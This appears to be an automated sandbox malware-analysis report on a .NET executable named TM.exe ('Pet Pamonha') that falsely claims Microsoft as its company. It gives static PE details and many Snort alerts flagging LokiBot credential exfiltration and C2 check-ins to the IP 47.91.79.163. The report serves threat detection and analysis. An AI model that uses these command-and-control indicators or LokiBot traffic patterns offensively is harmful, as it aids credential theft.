                                    SSDEEP:6144:iB5+r8OpllZciz0hFLXbfcruqroVjQghf3Hz5cM4lTwBB:iP+JPzC77PPjDvHz5n
                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....y._..............0..r............... ........@.. ....................................@................................

                                    File Icon

                                    Icon Hash:00828e8e8686b000

                                    Static PE Info

                                    General

                                    Entrypoint:0x459096
                                    Entrypoint Section:.text
                                    Digitally signed:false
                                    Imagebase:0x400000
                                    Subsystem:windows gui
                                    Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                    DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                    Time Stamp:0x5FC8791D [Thu Dec 3 05:35:25 2020 UTC]
                                    TLS Callbacks:
                                    CLR (.Net) Version:v4.0.30319
                                    OS Version Major:4
                                    OS Version Minor:0
                                    File Version Major:4
                                    File Version Minor:0
                                    Subsystem Version Major:4
                                    Subsystem Version Minor:0
                                    Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                    Entrypoint Preview

                                    Instruction
                                    jmp dword ptr [00402000h]
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al

                                    Data Directories

                                    NameVirtual AddressVirtual Size Is in Section
                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x590440x4f.text
                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x5a0000x58c.rsrc
                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x5c0000xc.reloc
                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                    Sections

                                    NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                    .text0x20000x5709c0x57200False0.826760334469data7.69094003544IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                    .rsrc0x5a0000x58c0x600False0.41796875data4.02687174462IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                    .reloc0x5c0000xc0x200False0.044921875data0.101910425663IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                    Resources

                                    NameRVASizeTypeLanguageCountry
                                    RT_VERSION0x5a0900x2fcdata
                                    RT_MANIFEST0x5a39c0x1eaXML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

                                    Imports

                                    DLLImport
                                    mscoree.dll_CorExeMain

                                    Version Infos

                                    DescriptionData
                                    Translation0x0000 0x04b0
                                    LegalCopyright
                                    Assembly Version2.0.0.0
                                    InternalNameTM.exe
                                    FileVersion2.0.0.0
                                    CompanyNameMicrosoft
                                    LegalTrademarks
                                    Comments
                                    ProductNamePet Pamonha
                                    ProductVersion2.0.0.0
                                    FileDescriptionPet Pamonha
                                    OriginalFilenameTM.exe

                                    Network Behavior

                                    Snort IDS Alerts

                                    TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                    12/03/20-10:02:28.939498TCP2024312ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M14970980192.168.2.347.91.79.163
                                    12/03/20-10:02:28.939498TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4970980192.168.2.347.91.79.163
                                    12/03/20-10:02:28.939498TCP2025381ET TROJAN LokiBot Checkin4970980192.168.2.347.91.79.163
                                    12/03/20-10:02:28.939498TCP2024317ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M24970980192.168.2.347.91.79.163
                                    12/03/20-10:02:28.939498TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4970980192.168.2.347.91.79.163
                                    12/03/20-10:02:29.293360TCP2024312ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M14971080192.168.2.347.91.79.163
                                    12/03/20-10:02:29.293360TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4971080192.168.2.347.91.79.163
                                    12/03/20-10:02:29.293360TCP2025381ET TROJAN LokiBot Checkin4971080192.168.2.347.91.79.163
                                    12/03/20-10:02:29.293360TCP2024317ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M24971080192.168.2.347.91.79.163
                                    12/03/20-10:02:29.293360TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4971080192.168.2.347.91.79.163
                                    12/03/20-10:02:29.611013TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14971180192.168.2.347.91.79.163
                                    12/03/20-10:02:29.611013TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4971180192.168.2.347.91.79.163
                                    12/03/20-10:02:29.611013TCP2025381ET TROJAN LokiBot Checkin4971180192.168.2.347.91.79.163
                                    12/03/20-10:02:29.611013TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24971180192.168.2.347.91.79.163
                                    12/03/20-10:02:29.611013TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4971180192.168.2.347.91.79.163
                                    12/03/20-10:02:29.858062TCP2025483ET TROJAN LokiBot Fake 404 Response804971147.91.79.163192.168.2.3
                                    12/03/20-10:02:30.152512TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14971280192.168.2.347.91.79.163
                                    12/03/20-10:02:30.152512TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4971280192.168.2.347.91.79.163
                                    12/03/20-10:02:30.152512TCP2025381ET TROJAN LokiBot Checkin4971280192.168.2.347.91.79.163
                                    12/03/20-10:02:30.152512TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24971280192.168.2.347.91.79.163
                                    12/03/20-10:02:30.152512TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4971280192.168.2.347.91.79.163
                                    12/03/20-10:02:30.214602TCP2025483ET TROJAN LokiBot Fake 404 Response804971247.91.79.163192.168.2.3
                                    12/03/20-10:02:30.776445TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14971380192.168.2.347.91.79.163
                                    12/03/20-10:02:30.776445TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4971380192.168.2.347.91.79.163
                                    12/03/20-10:02:30.776445TCP2025381ET TROJAN LokiBot Checkin4971380192.168.2.347.91.79.163
                                    12/03/20-10:02:30.776445TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24971380192.168.2.347.91.79.163
                                    12/03/20-10:02:30.776445TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4971380192.168.2.347.91.79.163
                                    12/03/20-10:02:30.840723TCP2025483ET TROJAN LokiBot Fake 404 Response804971347.91.79.163192.168.2.3
                                    12/03/20-10:02:31.118511TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14971480192.168.2.347.91.79.163
                                    12/03/20-10:02:31.118511TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4971480192.168.2.347.91.79.163
                                    12/03/20-10:02:31.118511TCP2025381ET TROJAN LokiBot Checkin4971480192.168.2.347.91.79.163
                                    12/03/20-10:02:31.118511TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24971480192.168.2.347.91.79.163
                                    12/03/20-10:02:31.118511TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4971480192.168.2.347.91.79.163
                                    12/03/20-10:02:31.264032TCP2025483ET TROJAN LokiBot Fake 404 Response804971447.91.79.163192.168.2.3
                                    12/03/20-10:02:31.524698TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14971580192.168.2.347.91.79.163
                                    12/03/20-10:02:31.524698TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4971580192.168.2.347.91.79.163
                                    12/03/20-10:02:31.524698TCP2025381ET TROJAN LokiBot Checkin4971580192.168.2.347.91.79.163
                                    12/03/20-10:02:31.524698TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24971580192.168.2.347.91.79.163
                                    12/03/20-10:02:31.524698TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4971580192.168.2.347.91.79.163
                                    12/03/20-10:02:31.584801TCP2025483ET TROJAN LokiBot Fake 404 Response804971547.91.79.163192.168.2.3
                                    12/03/20-10:02:31.827447TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14971680192.168.2.347.91.79.163
                                    12/03/20-10:02:31.827447TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4971680192.168.2.347.91.79.163
                                    12/03/20-10:02:31.827447TCP2025381ET TROJAN LokiBot Checkin4971680192.168.2.347.91.79.163
                                    12/03/20-10:02:31.827447TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24971680192.168.2.347.91.79.163
                                    12/03/20-10:02:31.827447TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4971680192.168.2.347.91.79.163
                                    12/03/20-10:02:31.881911TCP2025483ET TROJAN LokiBot Fake 404 Response804971647.91.79.163192.168.2.3
                                    12/03/20-10:02:32.151701TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14971780192.168.2.347.91.79.163
                                    12/03/20-10:02:32.151701TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4971780192.168.2.347.91.79.163
                                    12/03/20-10:02:32.151701TCP2025381ET TROJAN LokiBot Checkin4971780192.168.2.347.91.79.163
                                    12/03/20-10:02:32.151701TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24971780192.168.2.347.91.79.163
                                    12/03/20-10:02:32.151701TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4971780192.168.2.347.91.79.163
                                    12/03/20-10:02:32.212961TCP2025483ET TROJAN LokiBot Fake 404 Response804971747.91.79.163192.168.2.3
                                    12/03/20-10:02:32.492297TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14971880192.168.2.347.91.79.163
                                    12/03/20-10:02:32.492297TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4971880192.168.2.347.91.79.163
                                    12/03/20-10:02:32.492297TCP2025381ET TROJAN LokiBot Checkin4971880192.168.2.347.91.79.163
                                    12/03/20-10:02:32.492297TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24971880192.168.2.347.91.79.163
                                    12/03/20-10:02:32.492297TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4971880192.168.2.347.91.79.163
                                    12/03/20-10:02:32.556118TCP2025483ET TROJAN LokiBot Fake 404 Response804971847.91.79.163192.168.2.3
                                    12/03/20-10:02:32.765128TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14971980192.168.2.347.91.79.163
                                    12/03/20-10:02:32.765128TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4971980192.168.2.347.91.79.163
                                    12/03/20-10:02:32.765128TCP2025381ET TROJAN LokiBot Checkin4971980192.168.2.347.91.79.163
                                    12/03/20-10:02:32.765128TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24971980192.168.2.347.91.79.163
                                    12/03/20-10:02:32.765128TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4971980192.168.2.347.91.79.163
                                    12/03/20-10:02:32.824420TCP2025483ET TROJAN LokiBot Fake 404 Response804971947.91.79.163192.168.2.3
                                    12/03/20-10:02:33.073392TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14972080192.168.2.347.91.79.163
                                    12/03/20-10:02:33.073392TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4972080192.168.2.347.91.79.163
                                    12/03/20-10:02:33.073392TCP2025381ET TROJAN LokiBot Checkin4972080192.168.2.347.91.79.163
                                    12/03/20-10:02:33.073392TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24972080192.168.2.347.91.79.163
                                    12/03/20-10:02:33.073392TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4972080192.168.2.347.91.79.163
                                    12/03/20-10:02:33.145655TCP2025483ET TROJAN LokiBot Fake 404 Response804972047.91.79.163192.168.2.3
                                    12/03/20-10:02:33.392093TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14972180192.168.2.347.91.79.163
                                    12/03/20-10:02:33.392093TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4972180192.168.2.347.91.79.163
                                    12/03/20-10:02:33.392093TCP2025381ET TROJAN LokiBot Checkin4972180192.168.2.347.91.79.163
                                    12/03/20-10:02:33.392093TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24972180192.168.2.347.91.79.163
                                    12/03/20-10:02:33.392093TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4972180192.168.2.347.91.79.163
                                    12/03/20-10:02:33.455181TCP2025483ET TROJAN LokiBot Fake 404 Response804972147.91.79.163192.168.2.3
                                    12/03/20-10:02:33.703087TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14972280192.168.2.347.91.79.163
                                    12/03/20-10:02:33.703087TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4972280192.168.2.347.91.79.163
                                    12/03/20-10:02:33.703087TCP2025381ET TROJAN LokiBot Checkin4972280192.168.2.347.91.79.163
                                    12/03/20-10:02:33.703087TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24972280192.168.2.347.91.79.163
                                    12/03/20-10:02:33.703087TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4972280192.168.2.347.91.79.163
                                    12/03/20-10:02:33.764565TCP2025483ET TROJAN LokiBot Fake 404 Response804972247.91.79.163192.168.2.3
                                    12/03/20-10:02:34.056226TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14972380192.168.2.347.91.79.163
                                    12/03/20-10:02:34.056226TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4972380192.168.2.347.91.79.163
                                    12/03/20-10:02:34.056226TCP2025381ET TROJAN LokiBot Checkin4972380192.168.2.347.91.79.163
                                    12/03/20-10:02:34.056226TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24972380192.168.2.347.91.79.163
                                    12/03/20-10:02:34.056226TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4972380192.168.2.347.91.79.163
                                    12/03/20-10:02:34.116974TCP2025483ET TROJAN LokiBot Fake 404 Response804972347.91.79.163192.168.2.3
                                    12/03/20-10:02:34.377230TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14972480192.168.2.347.91.79.163
                                    12/03/20-10:02:34.377230TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4972480192.168.2.347.91.79.163
                                    12/03/20-10:02:34.377230TCP2025381ET TROJAN LokiBot Checkin4972480192.168.2.347.91.79.163
                                    12/03/20-10:02:34.377230TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24972480192.168.2.347.91.79.163
                                    12/03/20-10:02:34.377230TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4972480192.168.2.347.91.79.163
                                    12/03/20-10:02:34.437256TCP2025483ET TROJAN LokiBot Fake 404 Response804972447.91.79.163192.168.2.3
                                    12/03/20-10:02:34.827050TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14972580192.168.2.347.91.79.163
                                    12/03/20-10:02:34.827050TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4972580192.168.2.347.91.79.163
                                    12/03/20-10:02:34.827050TCP2025381ET TROJAN LokiBot Checkin4972580192.168.2.347.91.79.163
                                    12/03/20-10:02:34.827050TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24972580192.168.2.347.91.79.163
                                    12/03/20-10:02:34.827050TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4972580192.168.2.347.91.79.163
                                    12/03/20-10:02:34.971106TCP2025483ET TROJAN LokiBot Fake 404 Response804972547.91.79.163192.168.2.3
                                    12/03/20-10:02:35.243073TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14972680192.168.2.347.91.79.163
                                    12/03/20-10:02:35.243073TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4972680192.168.2.347.91.79.163
                                    12/03/20-10:02:35.243073TCP2025381ET TROJAN LokiBot Checkin4972680192.168.2.347.91.79.163
                                    12/03/20-10:02:35.243073TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24972680192.168.2.347.91.79.163
                                    12/03/20-10:02:35.243073TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4972680192.168.2.347.91.79.163
                                    12/03/20-10:02:35.402597TCP2025483ET TROJAN LokiBot Fake 404 Response804972647.91.79.163192.168.2.3
                                    12/03/20-10:02:36.028626TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14972780192.168.2.347.91.79.163
                                    12/03/20-10:02:36.028626TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4972780192.168.2.347.91.79.163
                                    12/03/20-10:02:36.028626TCP2025381ET TROJAN LokiBot Checkin4972780192.168.2.347.91.79.163
                                    12/03/20-10:02:36.028626TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24972780192.168.2.347.91.79.163
                                    12/03/20-10:02:36.028626TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4972780192.168.2.347.91.79.163
                                    12/03/20-10:02:36.086845TCP2025483ET TROJAN LokiBot Fake 404 Response804972747.91.79.163192.168.2.3
                                    12/03/20-10:02:36.313063TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14972880192.168.2.347.91.79.163
                                    12/03/20-10:02:36.313063TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4972880192.168.2.347.91.79.163
                                    12/03/20-10:02:36.313063TCP2025381ET TROJAN LokiBot Checkin4972880192.168.2.347.91.79.163
                                    12/03/20-10:02:36.313063TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24972880192.168.2.347.91.79.163
                                    12/03/20-10:02:36.313063TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4972880192.168.2.347.91.79.163
                                    12/03/20-10:02:36.372263TCP2025483ET TROJAN LokiBot Fake 404 Response804972847.91.79.163192.168.2.3
                                    12/03/20-10:02:36.782392TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14972980192.168.2.347.91.79.163
                                    12/03/20-10:02:36.782392TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4972980192.168.2.347.91.79.163
                                    12/03/20-10:02:36.782392TCP2025381ET TROJAN LokiBot Checkin4972980192.168.2.347.91.79.163
                                    12/03/20-10:02:36.782392TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24972980192.168.2.347.91.79.163
                                    12/03/20-10:02:36.782392TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4972980192.168.2.347.91.79.163
                                    12/03/20-10:02:36.844796TCP2025483ET TROJAN LokiBot Fake 404 Response804972947.91.79.163192.168.2.3
                                    12/03/20-10:02:38.586697TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14973080192.168.2.347.91.79.163
                                    12/03/20-10:02:38.586697TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4973080192.168.2.347.91.79.163
                                    12/03/20-10:02:38.586697TCP2025381ET TROJAN LokiBot Checkin4973080192.168.2.347.91.79.163
                                    12/03/20-10:02:38.586697TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24973080192.168.2.347.91.79.163
                                    12/03/20-10:02:38.586697TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4973080192.168.2.347.91.79.163
                                    12/03/20-10:02:38.645182TCP2025483ET TROJAN LokiBot Fake 404 Response804973047.91.79.163192.168.2.3
                                    12/03/20-10:02:38.904768TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14973180192.168.2.347.91.79.163
                                    12/03/20-10:02:38.904768TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4973180192.168.2.347.91.79.163
                                    12/03/20-10:02:38.904768TCP2025381ET TROJAN LokiBot Checkin4973180192.168.2.347.91.79.163
                                    12/03/20-10:02:38.904768TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24973180192.168.2.347.91.79.163
                                    12/03/20-10:02:38.904768TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4973180192.168.2.347.91.79.163
                                    12/03/20-10:02:38.965207TCP2025483ET TROJAN LokiBot Fake 404 Response804973147.91.79.163192.168.2.3
                                    12/03/20-10:02:39.202320TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14973480192.168.2.347.91.79.163
                                    12/03/20-10:02:39.202320TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4973480192.168.2.347.91.79.163
                                    12/03/20-10:02:39.202320TCP2025381ET TROJAN LokiBot Checkin4973480192.168.2.347.91.79.163
                                    12/03/20-10:02:39.202320TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24973480192.168.2.347.91.79.163
                                    12/03/20-10:02:39.202320TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4973480192.168.2.347.91.79.163
                                    12/03/20-10:02:39.261558TCP2025483ET TROJAN LokiBot Fake 404 Response804973447.91.79.163192.168.2.3
                                    12/03/20-10:02:39.538013TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14973580192.168.2.347.91.79.163
                                    12/03/20-10:02:39.538013TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4973580192.168.2.347.91.79.163
                                    12/03/20-10:02:39.538013TCP2025381ET TROJAN LokiBot Checkin4973580192.168.2.347.91.79.163
                                    12/03/20-10:02:39.538013TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24973580192.168.2.347.91.79.163
                                    12/03/20-10:02:39.538013TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4973580192.168.2.347.91.79.163
                                    12/03/20-10:02:39.596359TCP2025483ET TROJAN LokiBot Fake 404 Response804973547.91.79.163192.168.2.3
                                    12/03/20-10:02:39.856527TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14973680192.168.2.347.91.79.163
                                    12/03/20-10:02:39.856527TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4973680192.168.2.347.91.79.163
                                    12/03/20-10:02:39.856527TCP2025381ET TROJAN LokiBot Checkin4973680192.168.2.347.91.79.163
                                    12/03/20-10:02:39.856527TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24973680192.168.2.347.91.79.163
                                    12/03/20-10:02:39.856527TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4973680192.168.2.347.91.79.163
                                    12/03/20-10:02:39.914695TCP2025483ET TROJAN LokiBot Fake 404 Response804973647.91.79.163192.168.2.3
                                    12/03/20-10:02:40.172331TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14973980192.168.2.347.91.79.163
                                    12/03/20-10:02:40.172331TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4973980192.168.2.347.91.79.163
                                    12/03/20-10:02:40.172331TCP2025381ET TROJAN LokiBot Checkin4973980192.168.2.347.91.79.163
                                    12/03/20-10:02:40.172331TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24973980192.168.2.347.91.79.163
                                    12/03/20-10:02:40.172331TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4973980192.168.2.347.91.79.163
                                    12/03/20-10:02:40.234574TCP2025483ET TROJAN LokiBot Fake 404 Response804973947.91.79.163192.168.2.3
                                    12/03/20-10:02:40.464316TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14974080192.168.2.347.91.79.163
                                    12/03/20-10:02:40.464316TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4974080192.168.2.347.91.79.163
                                    12/03/20-10:02:40.464316TCP2025381ET TROJAN LokiBot Checkin4974080192.168.2.347.91.79.163
                                    12/03/20-10:02:40.464316TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24974080192.168.2.347.91.79.163
                                    12/03/20-10:02:40.464316TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4974080192.168.2.347.91.79.163
                                    12/03/20-10:02:40.524907TCP2025483ET TROJAN LokiBot Fake 404 Response804974047.91.79.163192.168.2.3
                                    12/03/20-10:02:40.771995TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14974280192.168.2.347.91.79.163
                                    12/03/20-10:02:40.771995TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4974280192.168.2.347.91.79.163
                                    12/03/20-10:02:40.771995TCP2025381ET TROJAN LokiBot Checkin4974280192.168.2.347.91.79.163
                                    12/03/20-10:02:40.771995TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24974280192.168.2.347.91.79.163
                                    12/03/20-10:02:40.771995TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4974280192.168.2.347.91.79.163
                                    12/03/20-10:02:40.829598TCP2025483ET TROJAN LokiBot Fake 404 Response804974247.91.79.163192.168.2.3
                                    12/03/20-10:02:41.097711TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14974380192.168.2.347.91.79.163
                                    12/03/20-10:02:41.097711TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4974380192.168.2.347.91.79.163
                                    12/03/20-10:02:41.097711TCP2025381ET TROJAN LokiBot Checkin4974380192.168.2.347.91.79.163
                                    12/03/20-10:02:41.097711TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24974380192.168.2.347.91.79.163
                                    12/03/20-10:02:41.097711TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4974380192.168.2.347.91.79.163
                                    12/03/20-10:02:41.155303TCP2025483ET TROJAN LokiBot Fake 404 Response804974347.91.79.163192.168.2.3
                                    12/03/20-10:02:41.418474TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14974480192.168.2.347.91.79.163
                                    12/03/20-10:02:41.418474TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4974480192.168.2.347.91.79.163
                                    12/03/20-10:02:41.418474TCP2025381ET TROJAN LokiBot Checkin4974480192.168.2.347.91.79.163
                                    12/03/20-10:02:41.418474TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24974480192.168.2.347.91.79.163
                                    12/03/20-10:02:41.418474TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4974480192.168.2.347.91.79.163
